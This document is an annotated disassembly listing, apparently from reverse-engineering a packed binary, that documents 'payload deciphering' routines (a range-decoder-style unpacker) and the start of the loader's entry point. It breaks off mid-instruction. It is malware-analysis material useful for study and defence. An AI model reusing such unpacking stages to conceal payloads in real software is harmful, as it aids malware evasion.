seg000:00C11DF0 ; ***************************************************************************** seg000:00C11DF0 ; * PAYLOAD DECIPHERING FUNCTIONS * seg000:00C11DF0 ; ***************************************************************************** seg000:00C11DF0 seg000:00C11DF0 ; =============== S U B R O U T I N E ======================================= seg000:00C11DF0 seg000:00C11DF0 seg000:00C11DF0 fill_with_0x400 proc near ; CODE XREF: seg000:00C1231A seg000:00C11DF0 mov ecx, [edx+28h] seg000:00C11DF3 add ecx, [edx+24h] seg000:00C11DF6 mov eax, [edx] seg000:00C11DF8 push esi seg000:00C11DF9 mov esi, 300h seg000:00C11DFE shl esi, cl seg000:00C11E00 lea ecx, [eax+esi*2+0E6Ch] seg000:00C11E07 seg000:00C11E07 loc_C11E07: ; CODE XREF: fill_with_0x400+24 seg000:00C11E07 mov esi, 400h seg000:00C11E0C mov [eax], si seg000:00C11E0F add eax, 2 seg000:00C11E12 cmp eax, ecx seg000:00C11E14 jb short loc_C11E07 seg000:00C11E16 and dword ptr [edx+18h], 0 seg000:00C11E1A pop esi seg000:00C11E1B retn seg000:00C11E1B fill_with_0x400 endp seg000:00C11E1B seg000:00C11E1C ; ============================================================ seg000:00C11E1C ; INPUT : seg000:00C11E1C ; [EAX+8] = Address in ciphered source buffer seg000:00C11E1C ; [EAX+0Ch] = seg000:00C11E1C ; seg000:00C11E1C ; OUTPUT : seg000:00C11E1C ; [EAX+8] = Address in ciphered source buffer not modified or incremented by 1 seg000:00C11E1C ; [EAX+0Ch] = Not modified or contains [EAX+0Ch]<<8 seg000:00C11E1C ; [EAX+10h] = Not modified or contains 1 byte of source buffer seg000:00C11E1C ; seg000:00C11E1C ; if ( arg2 < 0x1000000 ) seg000:00C11E1C ; { seg000:00C11E1C ; arg1 ++; seg000:00C11E1C ; arg2 = arg2<<8; seg000:00C11E1C ; arg3 = (arg3<<8 & 0xFFFFFF00) + *((unsigned char *) arg1); seg000:00C11E1C ; } seg000:00C11E1C seg000:00C11E1C seg000:00C11E1C ; =============== S U B R O U T I N E ======================================= seg000:00C11E1C seg000:00C11E1C seg000:00C11E1C GetOneSourceByte proc near ; CODE XREF: ChangeOneWord+D seg000:00C11E1C ; sub_C11EC3+307 ... seg000:00C11E1C mov ecx, [eax+0Ch] seg000:00C11E1F cmp ecx, 1000000h seg000:00C11E25 jnb short locret_C11E3D seg000:00C11E27 ; seg000:00C11E27 shl dword ptr [eax+10h], 8 ; [EAX+10h]<<8 seg000:00C11E2B shl ecx, 8 seg000:00C11E2E mov [eax+0Ch], ecx ; [EAX+0Ch]<<8 seg000:00C11E31 mov ecx, [eax+8] ; ECX = Address of source buffer seg000:00C11E34 mov dl, [ecx] ; DL = One byte of the source buffer seg000:00C11E36 inc ecx ; ECX += 1 seg000:00C11E37 mov [eax+10h], dl ; [EAX+10h] Byte read in source buffer seg000:00C11E3A mov [eax+8], ecx ; Address of source buffer ++ seg000:00C11E3D seg000:00C11E3D locret_C11E3D: ; CODE XREF: GetOneSourceByte+9 seg000:00C11E3D retn seg000:00C11E3D GetOneSourceByte endp seg000:00C11E3D seg000:00C11E3E ;*************************************************************** seg000:00C11E3E ; DESCRIPTION : Change a Word in memory with one of two methods seg000:00C11E3E ; according to some parameters. seg000:00C11E3E ; seg000:00C11E3E ; INPUT : seg000:00C11E3E ; [ESP+8] = Address of Word to modify in destination buffer seg000:00C11E3E ; [EAX+8] = Address of Ciphered buffer seg000:00C11E3E ; [EAX+0Ch] seg000:00C11E3E ; [EAX+10h] seg000:00C11E3E ; [EAX+20h] = Word value before change seg000:00C11E3E ; seg000:00C11E3E ; OUTPUT : seg000:00C11E3E ; [EAX+0Ch] = seg000:00C11E3E ; [EAX+10h] = seg000:00C11E3E ; seg000:00C11E3E ; RETURN : seg000:00C11E3E : EAX=0 or 1 seg000:00C11E3E seg000:00C11E3E ; =============== S U B R O U T I N E ======================================= seg000:00C11E3E seg000:00C11E3E seg000:00C11E3E ChangeOneWord proc near ; CODE XREF: sub_C11E9C+12 seg000:00C11E3E ; sub_C11EC3+42 ... seg000:00C11E3E seg000:00C11E3E arg_0 = dword ptr 4 seg000:00C11E3E seg000:00C11E3E push ebx ; Saving EBX seg000:00C11E3F mov ebx, [esp+4+arg_0] ; EBX=address of Word to change (0xFAA000) seg000:00C11E43 movzx ecx, word ptr [ebx] ; ECX=Word before change seg000:00C11E46 push esi ; Saving ESI seg000:00C11E47 push edi ; Saving EDI seg000:00C11E48 mov [eax+20h], ecx ; [EAX+20h] = Word value before change seg000:00C11E4B call GetOneSourceByte seg000:00C11E50 mov ecx, [eax+0Ch] seg000:00C11E53 mov edi, [eax+20h] seg000:00C11E56 mov esi, [eax+10h] seg000:00C11E59 mov edx, ecx seg000:00C11E5B shr edx, 0Bh seg000:00C11E5E imul edx, edi seg000:00C11E61 cmp esi, edx seg000:00C11E63 jnb short loc_C11E7C seg000:00C11E65 ; seg000:00C11E65 mov ecx, 800h seg000:00C11E6A sub ecx, edi ; ECX=0x800-[Word value before change] seg000:00C11E6C shr ecx, 5 ; ECX=ECX/32 seg000:00C11E6F add cx, di ; CX=CX+[Word value before change] seg000:00C11E72 mov [eax+0Ch], edx ; [EAX+0Ch] = ([EAX+0Ch]>>11)*[Word value before change] seg000:00C11E75 mov [ebx], cx ; !!! Modify a WORD !!! New Word Value = ((800h-[Word value before change])/32)+[Word value before change] seg000:00C11E78 xor eax, eax ; Return EAX=0 seg000:00C11E7A jmp short loc_C11E96 seg000:00C11E7C ; --------------------------------------------------------------------------- seg000:00C11E7C seg000:00C11E7C loc_C11E7C: ; CODE XREF: ChangeOneWord+25 seg000:00C11E7C sub ecx, edx seg000:00C11E7E mov [eax+0Ch], ecx ; [EAX+0Ch] = [EAX+0Ch]-(([EAX+0Ch]>>11)*[Word value before change]) seg000:00C11E81 sub esi, edx seg000:00C11E83 mov [eax+10h], esi ; [EAX+10h] = [EAX+10h]-(([EAX+0Ch]>>11)*[Word value before change]) seg000:00C11E86 mov ax, [eax+20h] seg000:00C11E8A shr edi, 5 seg000:00C11E8D sub ax, di ; New Word value = [Word value before change]-([Word value before change]/32) seg000:00C11E90 mov [ebx], ax ; !!! Modify a WORD !!! seg000:00C11E93 xor eax, eax seg000:00C11E95 inc eax ; Return EAX=1 seg000:00C11E96 seg000:00C11E96 loc_C11E96: ; CODE XREF: ChangeOneWord+3C seg000:00C11E96 pop edi seg000:00C11E97 pop esi seg000:00C11E98 pop ebx seg000:00C11E99 retn 4 seg000:00C11E99 ChangeOneWord endp seg000:00C11E99 seg000:00C11E9C seg000:00C11E9C ; =============== S U B R O U T I N E ======================================= seg000:00C11E9C seg000:00C11E9C seg000:00C11E9C sub_C11E9C proc near ; CODE XREF: sub_C11EC3+26B seg000:00C11E9C ; sub_C11EC3+29E seg000:00C11E9C seg000:00C11E9C arg_0 = dword ptr 4 seg000:00C11E9C arg_4 = dword ptr 8 seg000:00C11E9C arg_8 = dword ptr 0Ch seg000:00C11E9C seg000:00C11E9C xor eax, eax seg000:00C11E9E inc eax seg000:00C11E9F push esi seg000:00C11EA0 seg000:00C11EA0 loc_C11EA0: ; CODE XREF: sub_C11E9C+1D seg000:00C11EA0 lea esi, [eax+eax] seg000:00C11EA3 mov eax, [esp+4+arg_4] seg000:00C11EA7 add eax, esi seg000:00C11EA9 push eax seg000:00C11EAA mov eax, [esp+8+arg_0] seg000:00C11EAE call ChangeOneWord seg000:00C11EB3 add eax, esi seg000:00C11EB5 cmp eax, [esp+4+arg_8] seg000:00C11EB9 jb short loc_C11EA0 seg000:00C11EBB ; seg000:00C11EBB sub eax, [esp+4+arg_8] seg000:00C11EBF pop esi seg000:00C11EC0 retn 0Ch seg000:00C11EC0 sub_C11E9C endp seg000:00C11EC0 seg000:00C11EC3 ; ********************************************************************* seg000:00C11EC3 ; Entrée : seg000:00C11EC3 ; EBP+8 = 0x2134D3 seg000:00C11EC3 ; seg000:00C11EC3 ; ESI = seg000:00C11EC3 ; [ESI+4] = 0xD90000 => Destination block addres. [ESI+4] is never modified ! seg000:00C11EC3 ; [ESI+14h] = writing offset in destination block. seg000:00C11EC3 ; [ESI+18h] = seg000:00C11EC3 ; [ESI+24h] = seg000:00C11EC3 ; [ESI+28h] = seg000:00C11EC3 : [ESI+2Ch] = seg000:00C11EC3 seg000:00C11EC3 ; =============== S U B R O U T I N E ======================================= seg000:00C11EC3 seg000:00C11EC3 ; Attributes: bp-based frame seg000:00C11EC3 seg000:00C11EC3 sub_C11EC3 proc near ; CODE XREF: seg000:00C1233A seg000:00C11EC3 seg000:00C11EC3 var_28 = dword ptr -28h seg000:00C11EC3 var_24 = dword ptr -24h seg000:00C11EC3 var_20 = dword ptr -20h seg000:00C11EC3 var_1C = dword ptr -1Ch seg000:00C11EC3 var_18 = dword ptr -18h seg000:00C11EC3 var_14 = dword ptr -14h seg000:00C11EC3 var_10 = dword ptr -10h seg000:00C11EC3 var_C = dword ptr -0Ch seg000:00C11EC3 var_8 = dword ptr -8 seg000:00C11EC3 var_4 = dword ptr -4 seg000:00C11EC3 arg_0 = dword ptr 8 seg000:00C11EC3 seg000:00C11EC3 push ebp ; EBP=0x12FFAC seg000:00C11EC4 mov ebp, esp ; EBP=0x12FF50 seg000:00C11EC6 sub esp, 28h ; ESP=0x12FF28 seg000:00C11EC9 mov ecx, [esi+2Ch] ; ECX=1 seg000:00C11ECC push ebx ; EBX=0xD90000 seg000:00C11ECD push edi ; EDI=0x18736 seg000:00C11ECE xor edi, edi seg000:00C11ED0 inc edi ; EDI=1 seg000:00C11ED1 mov edx, edi ; EDX=1 seg000:00C11ED3 shl edx, cl ; EDX=2 seg000:00C11ED5 mov ecx, [esi+28h] ; ECX=0 seg000:00C11ED8 mov eax, edi ; EAX=1 seg000:00C11EDA shl eax, cl ; EAX=1 seg000:00C11EDC dec edx ; EDX=1 seg000:00C11EDD mov [ebp+var_28], edi ; 1 seg000:00C11EE0 mov [ebp+var_24], edi ; 1 seg000:00C11EE3 dec eax seg000:00C11EE4 mov [ebp+var_20], edi ; 1 seg000:00C11EE7 mov [ebp+var_1C], edi ; 1 seg000:00C11EEA mov [ebp+var_18], edx ; 1 seg000:00C11EED mov [ebp+var_10], eax ; 0 seg000:00C11EF0 seg000:00C11EF0 loc_C11EF0: ; CODE XREF: sub_C11EC3+3CB seg000:00C11EF0 mov ebx, [esi+14h] seg000:00C11EF3 mov eax, [esi+18h] seg000:00C11EF6 mov ecx, [esi] seg000:00C11EF8 shl eax, 4 seg000:00C11EFB and ebx, edx seg000:00C11EFD add eax, ebx seg000:00C11EFF lea eax, [ecx+eax*2] seg000:00C11F02 push eax ; Stacking address of Word to modify seg000:00C11F03 mov eax, esi seg000:00C11F05 call ChangeOneWord seg000:00C11F0A test eax, eax seg000:00C11F0C jnz EAX_1a seg000:00C11F12 mov ebx, [esi] seg000:00C11F14 mov [ebp+var_4], edi seg000:00C11F17 mov edi, [esi+14h] seg000:00C11F1A add ebx, 0E6Ch seg000:00C11F20 test edi, edi seg000:00C11F22 jz short loc_C11F4F seg000:00C11F24 mov ecx, [esi+4] seg000:00C11F27 movzx edx, byte ptr [ecx+edi-1] seg000:00C11F2C mov eax, [esi+24h] seg000:00C11F2F push 8 seg000:00C11F31 pop ecx seg000:00C11F32 sub cl, al seg000:00C11F34 shr edx, cl seg000:00C11F36 mov ecx, edi seg000:00C11F38 and ecx, [ebp+var_10] seg000:00C11F3B mov [ebp+var_C], ecx seg000:00C11F3E mov ecx, eax seg000:00C11F40 mov eax, [ebp+var_C] seg000:00C11F43 shl eax, cl seg000:00C11F45 add edx, eax seg000:00C11F47 imul edx, 600h seg000:00C11F4D add ebx, edx seg000:00C11F4F seg000:00C11F4F loc_C11F4F: ; CODE XREF: sub_C11EC3+5F seg000:00C11F4F mov eax, [esi+18h] seg000:00C11F52 cmp eax, 7 seg000:00C11F55 jnb short loc_C11F86 seg000:00C11F57 cmp eax, 4 seg000:00C11F5A jnb short loc_C11F60 seg000:00C11F5C mov ecx, eax seg000:00C11F5E jmp short loc_C11F63 seg000:00C11F60 ; --------------------------------------------------------------------------- seg000:00C11F60 seg000:00C11F60 loc_C11F60: ; CODE XREF: sub_C11EC3+97 seg000:00C11F60 push 3 seg000:00C11F62 pop ecx seg000:00C11F63 seg000:00C11F63 loc_C11F63: ; CODE XREF: sub_C11EC3+9B seg000:00C11F63 sub eax, ecx seg000:00C11F65 mov [esi+18h], eax seg000:00C11F68 seg000:00C11F68 loc_C11F68: ; CODE XREF: sub_C11EC3+BF seg000:00C11F68 mov edi, [ebp+var_4] seg000:00C11F6B add edi, edi seg000:00C11F6D lea eax, [edi+ebx] ; EAX = address of next byte in the ciphered source seg000:00C11F70 push eax seg000:00C11F71 mov eax, esi seg000:00C11F73 call ChangeOneWord seg000:00C11F78 add eax, edi seg000:00C11F7A mov [ebp+var_4], eax seg000:00C11F7D cmp eax, 100h seg000:00C11F82 jb short loc_C11F68 seg000:00C11F84 jmp short loc_C11FE0 seg000:00C11F86 ; --------------------------------------------------------------------------- seg000:00C11F86 seg000:00C11F86 loc_C11F86: ; CODE XREF: sub_C11EC3+92 seg000:00C11F86 mov ecx, [esi+4] seg000:00C11F89 sub ecx, [ebp+var_28] seg000:00C11F8C cmp eax, 0Ah seg000:00C11F8F movzx ecx, byte ptr [ecx+edi] seg000:00C11F93 mov [ebp+var_C], ecx seg000:00C11F96 sbb ecx, ecx seg000:00C11F98 and ecx, 0FFFFFFFDh seg000:00C11F9B add ecx, 6 seg000:00C11F9E sub eax, ecx seg000:00C11FA0 mov [ebp+var_8], 100h seg000:00C11FA7 mov [esi+18h], eax seg000:00C11FAA seg000:00C11FAA loc_C11FAA: ; CODE XREF: sub_C11EC3+11B seg000:00C11FAA mov eax, [ebp+var_8] seg000:00C11FAD shl [ebp+var_C], 1 seg000:00C11FB0 mov edi, eax seg000:00C11FB2 and edi, [ebp+var_C] seg000:00C11FB5 add eax, edi seg000:00C11FB7 add eax, [ebp+var_4] seg000:00C11FBA lea eax, [ebx+eax*2] seg000:00C11FBD push eax seg000:00C11FBE mov eax, esi seg000:00C11FC0 call ChangeOneWord seg000:00C11FC5 mov ecx, [ebp+var_4] seg000:00C11FC8 lea ecx, [eax+ecx*2] seg000:00C11FCB mov [ebp+var_4], ecx seg000:00C11FCE test eax, eax seg000:00C11FD0 jnz short loc_C11FD4 seg000:00C11FD2 not edi seg000:00C11FD4 seg000:00C11FD4 loc_C11FD4: ; CODE XREF: sub_C11EC3+10D seg000:00C11FD4 and [ebp+var_8], edi seg000:00C11FD7 cmp [ebp+var_4], 100h seg000:00C11FDE jb short loc_C11FAA seg000:00C11FE0 seg000:00C11FE0 loc_C11FE0: ; CODE XREF: sub_C11EC3+C1 seg000:00C11FE0 mov eax, [esi+14h] seg000:00C11FE3 mov ecx, [esi+4] seg000:00C11FE6 mov dl, byte ptr [ebp+var_4] seg000:00C11FE9 mov [eax+ecx], dl ; <=============== Write one byte in destination buffer ! seg000:00C11FEC inc eax seg000:00C11FED mov [esi+14h], eax seg000:00C11FF0 jmp loc_C12280 seg000:00C11FF5 ; --------------------------------------------------------------------------- seg000:00C11FF5 seg000:00C11FF5 EAX_1a: ; CODE XREF: sub_C11EC3+49 seg000:00C11FF5 mov eax, [esi+18h] seg000:00C11FF8 mov ecx, [esi] seg000:00C11FFA lea eax, [ecx+eax*2+180h] seg000:00C12001 push eax seg000:00C12002 mov eax, esi seg000:00C12004 call ChangeOneWord seg000:00C12009 test eax, eax seg000:00C1200B jnz short loc_C1201E seg000:00C1200D mov edi, [esi] seg000:00C1200F add dword ptr [esi+18h], 0Ch seg000:00C12013 add edi, 664h seg000:00C12019 jmp loc_C120DF seg000:00C1201E ; --------------------------------------------------------------------------- seg000:00C1201E seg000:00C1201E loc_C1201E: ; CODE XREF: sub_C11EC3+148 seg000:00C1201E mov eax, [esi+18h] seg000:00C12021 mov ecx, [esi] seg000:00C12023 lea eax, [ecx+eax*2+198h] seg000:00C1202A push eax seg000:00C1202B mov eax, esi seg000:00C1202D call ChangeOneWord seg000:00C12032 mov ecx, [esi] seg000:00C12034 test eax, eax seg000:00C12036 mov eax, [esi+18h] seg000:00C12039 jnz short EAX_1b seg000:00C1203B add eax, 0Fh seg000:00C1203E shl eax, 4 seg000:00C12041 add eax, ebx seg000:00C12043 lea eax, [ecx+eax*2] seg000:00C12046 push eax seg000:00C12047 mov eax, esi seg000:00C12049 call ChangeOneWord seg000:00C1204E test eax, eax seg000:00C12050 jnz short loc_C120C8 seg000:00C12052 mov eax, [esi+14h] seg000:00C12055 mov ecx, [esi+4] seg000:00C12058 add ecx, eax seg000:00C1205A mov edx, ecx seg000:00C1205C sub edx, [ebp+var_28] seg000:00C1205F inc eax seg000:00C12060 cmp dword ptr [esi+18h], 7 seg000:00C12064 mov dl, [edx] seg000:00C12066 mov [esi+14h], eax seg000:00C12069 sbb eax, eax seg000:00C1206B and eax, 0FFFFFFFEh seg000:00C1206E add eax, 0Bh seg000:00C12071 mov [ecx], dl seg000:00C12073 mov [esi+18h], eax seg000:00C12076 jmp nextBlock seg000:00C1207B ; --------------------------------------------------------------------------- seg000:00C1207B seg000:00C1207B EAX_1b: ; CODE XREF: sub_C11EC3+176 seg000:00C1207B lea eax, [ecx+eax*2+1B0h] seg000:00C12082 push eax seg000:00C12083 mov eax, esi seg000:00C12085 call ChangeOneWord seg000:00C1208A test eax, eax seg000:00C1208C jnz short EAX_1c seg000:00C1208E mov eax, [ebp+var_24] seg000:00C12091 jmp short loc_C120BF seg000:00C12093 ; --------------------------------------------------------------------------- seg000:00C12093 seg000:00C12093 EAX_1c: ; CODE XREF: sub_C11EC3+1C9 seg000:00C12093 mov eax, [esi+18h] seg000:00C12096 mov ecx, [esi] seg000:00C12098 lea eax, [ecx+eax*2+1C8h] seg000:00C1209F push eax seg000:00C120A0 mov eax, esi seg000:00C120A2 call ChangeOneWord seg000:00C120A7 test eax, eax seg000:00C120A9 jnz short EAX_1d seg000:00C120AB mov eax, [ebp+var_20] seg000:00C120AE jmp short loc_C120B9 seg000:00C120B0 ; --------------------------------------------------------------------------- seg000:00C120B0 seg000:00C120B0 EAX_1d: ; CODE XREF: sub_C11EC3+1E6 seg000:00C120B0 mov ecx, [ebp+var_20] seg000:00C120B3 mov eax, [ebp+var_1C] seg000:00C120B6 mov [ebp+var_1C], ecx seg000:00C120B9 seg000:00C120B9 loc_C120B9: ; CODE XREF: sub_C11EC3+1EB seg000:00C120B9 mov ecx, [ebp+var_24] seg000:00C120BC mov [ebp+var_20], ecx seg000:00C120BF seg000:00C120BF loc_C120BF: ; CODE XREF: sub_C11EC3+1CE seg000:00C120BF mov ecx, [ebp+var_28] seg000:00C120C2 mov [ebp+var_24], ecx seg000:00C120C5 mov [ebp+var_28], eax seg000:00C120C8 seg000:00C120C8 loc_C120C8: ; CODE XREF: sub_C11EC3+18D seg000:00C120C8 cmp dword ptr [esi+18h], 7 seg000:00C120CC mov edi, [esi] seg000:00C120CE sbb eax, eax seg000:00C120D0 and eax, 0FFFFFFFDh seg000:00C120D3 add eax, 0Bh seg000:00C120D6 mov [esi+18h], eax seg000:00C120D9 add edi, 0A68h seg000:00C120DF seg000:00C120DF loc_C120DF: ; CODE XREF: sub_C11EC3+156 seg000:00C120DF push edi seg000:00C120E0 mov eax, esi seg000:00C120E2 call ChangeOneWord seg000:00C120E7 test eax, eax seg000:00C120E9 jnz short EAX_1e seg000:00C120EB add ebx, ebx seg000:00C120ED and [ebp+var_C], eax seg000:00C120F0 push 8 seg000:00C120F2 lea edi, [edi+ebx*8+4] seg000:00C120F6 pop eax seg000:00C120F7 jmp short loc_C1212B seg000:00C120F9 ; --------------------------------------------------------------------------- seg000:00C120F9 seg000:00C120F9 EAX_1e: ; CODE XREF: sub_C11EC3+226 seg000:00C120F9 lea eax, [edi+2] seg000:00C120FC push eax seg000:00C120FD mov eax, esi seg000:00C120FF call ChangeOneWord seg000:00C12104 test eax, eax seg000:00C12106 jnz short EAX_1f seg000:00C12108 push 8 seg000:00C1210A add ebx, ebx seg000:00C1210C pop eax seg000:00C1210D lea edi, [edi+ebx*8+104h] seg000:00C12114 mov [ebp+var_C], eax seg000:00C12117 jmp short loc_C1212B seg000:00C12119 ; --------------------------------------------------------------------------- seg000:00C12119 seg000:00C12119 EAX_1f: ; CODE XREF: sub_C11EC3+243 seg000:00C12119 add edi, 204h seg000:00C1211F mov [ebp+var_C], 10h seg000:00C12126 mov eax, 100h seg000:00C1212B seg000:00C1212B loc_C1212B: ; CODE XREF: sub_C11EC3+234 seg000:00C1212B ; sub_C11EC3+254 seg000:00C1212B push eax seg000:00C1212C push edi seg000:00C1212D push esi seg000:00C1212E call sub_C11E9C seg000:00C12133 mov ebx, eax seg000:00C12135 add ebx, [ebp+var_C] seg000:00C12138 cmp dword ptr [esi+18h], 0Ch seg000:00C1213C mov [ebp+var_4], ebx seg000:00C1213F jb loc_C12252 seg000:00C12145 cmp ebx, 4 seg000:00C12148 jnb short loc_C1214E seg000:00C1214A mov eax, ebx seg000:00C1214C jmp short loc_C12151 seg000:00C1214E ; --------------------------------------------------------------------------- seg000:00C1214E seg000:00C1214E loc_C1214E: ; CODE XREF: sub_C11EC3+285 seg000:00C1214E push 3 seg000:00C12150 pop eax seg000:00C12151 seg000:00C12151 loc_C12151: ; CODE XREF: sub_C11EC3+289 seg000:00C12151 mov ecx, [esi] seg000:00C12153 shl eax, 7 seg000:00C12156 push 40h seg000:00C12158 lea eax, [eax+ecx+360h] seg000:00C1215F push eax seg000:00C12160 push esi seg000:00C12161 call sub_C11E9C seg000:00C12166 mov edi, eax seg000:00C12168 cmp edi, 4 seg000:00C1216B jb loc_C1222D seg000:00C12171 xor eax, eax seg000:00C12173 mov ebx, edi seg000:00C12175 mov edx, edi seg000:00C12177 inc eax seg000:00C12178 shr ebx, 1 seg000:00C1217A and edi, eax seg000:00C1217C dec ebx seg000:00C1217D or edi, 2 seg000:00C12180 mov [ebp+var_8], ebx seg000:00C12183 cmp edx, 0Eh seg000:00C12186 jnb short loc_C121C5 seg000:00C12188 mov ecx, ebx seg000:00C1218A shl edi, cl seg000:00C1218C mov [ebp+var_C], eax seg000:00C1218F mov ecx, edi seg000:00C12191 sub ecx, edx seg000:00C12193 mov edx, [esi] seg000:00C12195 lea ecx, [edx+ecx*2+55Eh] seg000:00C1219C mov [ebp+var_14], ecx seg000:00C1219F mov ecx, eax seg000:00C121A1 seg000:00C121A1 loc_C121A1: ; CODE XREF: sub_C11EC3+2FE seg000:00C121A1 mov eax, [ebp+var_14] seg000:00C121A4 lea ebx, [ecx+ecx] seg000:00C121A7 add eax, ebx seg000:00C121A9 push eax seg000:00C121AA mov eax, esi seg000:00C121AC call ChangeOneWord seg000:00C121B1 lea ecx, [ebx+eax] seg000:00C121B4 test eax, eax seg000:00C121B6 jz short EAX_0a seg000:00C121B8 or edi, [ebp+var_C] seg000:00C121BB seg000:00C121BB EAX_0a: ; CODE XREF: sub_C11EC3+2F3 seg000:00C121BB shl [ebp+var_C], 1 seg000:00C121BE dec [ebp+var_8] seg000:00C121C1 jnz short loc_C121A1 seg000:00C121C3 jmp short loc_C1222A seg000:00C121C5 ; --------------------------------------------------------------------------- seg000:00C121C5 seg000:00C121C5 loc_C121C5: ; CODE XREF: sub_C11EC3+2C3 seg000:00C121C5 sub ebx, 4 seg000:00C121C8 seg000:00C121C8 loc_C121C8: ; CODE XREF: sub_C11EC3+32A seg000:00C121C8 mov eax, esi seg000:00C121CA call GetOneSourceByte seg000:00C121CF shr dword ptr [esi+0Ch], 1 seg000:00C121D2 mov eax, [esi+0Ch] seg000:00C121D5 mov edx, [esi+10h] seg000:00C121D8 sub edx, eax seg000:00C121DA mov ecx, edx seg000:00C121DC shr ecx, 1Fh seg000:00C121DF neg ecx seg000:00C121E1 and eax, ecx seg000:00C121E3 add eax, edx seg000:00C121E5 dec ebx seg000:00C121E6 lea edi, [ecx+edi*2+1] seg000:00C121EA mov [esi+10h], eax seg000:00C121ED jnz short loc_C121C8 seg000:00C121EF mov ebx, [esi] seg000:00C121F1 xor ecx, ecx seg000:00C121F3 add ebx, 644h seg000:00C121F9 shl edi, 4 seg000:00C121FC inc ecx seg000:00C121FD mov [ebp+var_8], ecx seg000:00C12200 seg000:00C12200 loc_C12200: ; CODE XREF: sub_C11EC3+360 seg000:00C12200 lea eax, [ecx+ecx] seg000:00C12203 mov [ebp+var_14], eax seg000:00C12206 add eax, ebx seg000:00C12208 push eax seg000:00C12209 mov eax, esi seg000:00C1220B call ChangeOneWord seg000:00C12210 mov ecx, [ebp+var_14] seg000:00C12213 add ecx, eax seg000:00C12215 test eax, eax seg000:00C12217 jz short EAX_0b seg000:00C12219 or edi, [ebp+var_8] seg000:00C1221C seg000:00C1221C EAX_0b: ; CODE XREF: sub_C11EC3+354 seg000:00C1221C shl [ebp+var_8], 1 seg000:00C1221F cmp [ebp+var_8], 10h seg000:00C12223 jl short loc_C12200 seg000:00C12225 cmp edi, 0FFFFFFFFh seg000:00C12228 jz short loc_C12293 seg000:00C1222A seg000:00C1222A loc_C1222A: ; CODE XREF: sub_C11EC3+300 seg000:00C1222A mov ebx, [ebp+var_4] seg000:00C1222D seg000:00C1222D loc_C1222D: ; CODE XREF: sub_C11EC3+2A8 seg000:00C1222D mov eax, [ebp+var_20] seg000:00C12230 mov [ebp+var_1C], eax seg000:00C12233 mov eax, [ebp+var_24] seg000:00C12236 mov [ebp+var_20], eax seg000:00C12239 mov eax, [ebp+var_28] seg000:00C1223C inc edi seg000:00C1223D cmp dword ptr [esi+18h], 13h seg000:00C12241 mov [ebp+var_24], eax seg000:00C12244 sbb eax, eax seg000:00C12246 and eax, 0FFFFFFFDh seg000:00C12249 add eax, 0Ah seg000:00C1224C mov [ebp+var_28], edi seg000:00C1224F mov [esi+18h], eax seg000:00C12252 seg000:00C12252 loc_C12252: ; CODE XREF: sub_C11EC3+27C seg000:00C12252 mov edx, [esi+14h] ; EDX=index in dest buffer seg000:00C12255 mov eax, [ebp+arg_0] ; EAX=size of dest buffer seg000:00C12258 mov ecx, [ebp+var_28] seg000:00C1225B sub eax, edx seg000:00C1225D add ebx, 2 seg000:00C12260 cmp eax, ebx seg000:00C12262 mov edi, eax seg000:00C12264 mov eax, [esi+4] seg000:00C12267 cmovnb edi, ebx ; mov if ZF=0 (ie if EAX!=EBX) seg000:00C1226A add eax, edx seg000:00C1226C neg ecx seg000:00C1226E add edx, edi seg000:00C12270 lea ebx, [eax+edi] seg000:00C12273 mov [esi+14h], edx seg000:00C12276 seg000:00C12276 loc_C12276: ; CODE XREF: sub_C11EC3+3BB seg000:00C12276 mov dl, [ecx+eax] seg000:00C12279 mov [eax], dl seg000:00C1227B inc eax seg000:00C1227C cmp eax, ebx seg000:00C1227E jnz short loc_C12276 seg000:00C12280 seg000:00C12280 loc_C12280: ; CODE XREF: sub_C11EC3+12D seg000:00C12280 xor edi, edi seg000:00C12282 inc edi seg000:00C12283 seg000:00C12283 nextBlock: ; CODE XREF: sub_C11EC3+1B3 seg000:00C12283 mov eax, [esi+14h] seg000:00C12286 cmp eax, [ebp+arg_0] ; Destination buffer full ? seg000:00C12289 jnb short loc_C12297 ; Yes => this is the end ! seg000:00C1228B mov edx, [ebp+var_18] seg000:00C1228E jmp loc_C11EF0 ; No, next block please... seg000:00C12293 ; --------------------------------------------------------------------------- seg000:00C12293 seg000:00C12293 loc_C12293: ; CODE XREF: sub_C11EC3+365 seg000:00C12293 add dword ptr [esi+18h], 0FFFFFFF4h seg000:00C12297 seg000:00C12297 loc_C12297: ; CODE XREF: sub_C11EC3+3C6 seg000:00C12297 mov eax, esi seg000:00C12299 call GetOneSourceByte seg000:00C1229E pop edi seg000:00C1229F xor eax, eax seg000:00C122A1 pop ebx seg000:00C122A2 leave seg000:00C122A3 retn 4 seg000:00C122A3 sub_C11EC3 endp seg000:00C122A3 ; ***************************************************************************** seg000:00C122A3 ; * END OF DECIPHERING FUNCTIONS * seg000:00C122A3 ; ***************************************************************************** seg000:00C122A3 seg000:00C122A3 seg000:00C122A3 seg000:00C122A6 ; *********************************************************** seg000:00C122A6 ; * Entry point * seg000:00C122A6 ; *********************************************************** seg000:00C122A6 ; seg000:00C122A6 ; IN : seg000:00C122A6 ; ------------------- seg000:00C122A6 ; [EBP+8] = 0x401000 (Start of code segment) seg000:00C122A6 ; [EBP+0Ch] = 0xB70000 (Start of memory block where we are, contains previous deciphered payload) seg000:00C122A6 ; [EBP+10h] = 0x4A39A (End of source of last deciphered payload) seg000:00C122A6 ; seg000:00C122A6 ; Locals : seg000:00C122A6 ; ----------------- seg000:00C122A6 ; [EBP-4] = 0x2134D3 seg000:00C122A6 ; [EBP-10h] = 0x21A000 (size of memory block where we are) seg000:00C122A6 seg000:00C122A6 seg000:00C122A6 loc_C122A6: ; CODE XREF: seg000:00C12504 seg000:00C122A6 push ebp seg000:00C122A7 mov ebp, esp seg000:00C122A9 sub esp, 44h seg000:00C122AC push ebx ; EBX=0x401000 seg000:00C122AD push esi ; ESI=0x4A439A (source end of the last copy, ie step3) seg000:00C122AE mov esi, [ebp+0Ch] ; Block address in which we are : 00B70000h seg000:00C122B1 push edi ; End of destination block of last copy, ie step3. So end (filled) of block in which we are (C12509h). seg000:00C122B2 lea eax, [esi+10h] ; EAX=B70010h seg000:00C122B5 mov ebx, [eax] ; EBX=21A000h (block size) seg000:00C122B7 mov [ebp-10h], eax seg000:00C122BA mov eax, [esi+25h] ; EAX=002134D3h seg000:00C122BD mov [ebp-4], eax seg000:00C122C0 movzx eax, byte ptr [esi+20h] ; EAX=34h seg000:00C122C4 push 9 seg000:00C122C6 pop ecx ; ECX=9 seg000:00C122C7 xor edx, edx seg000:00C122C9 div ecx ; EAX/ECX (EAX=quotient 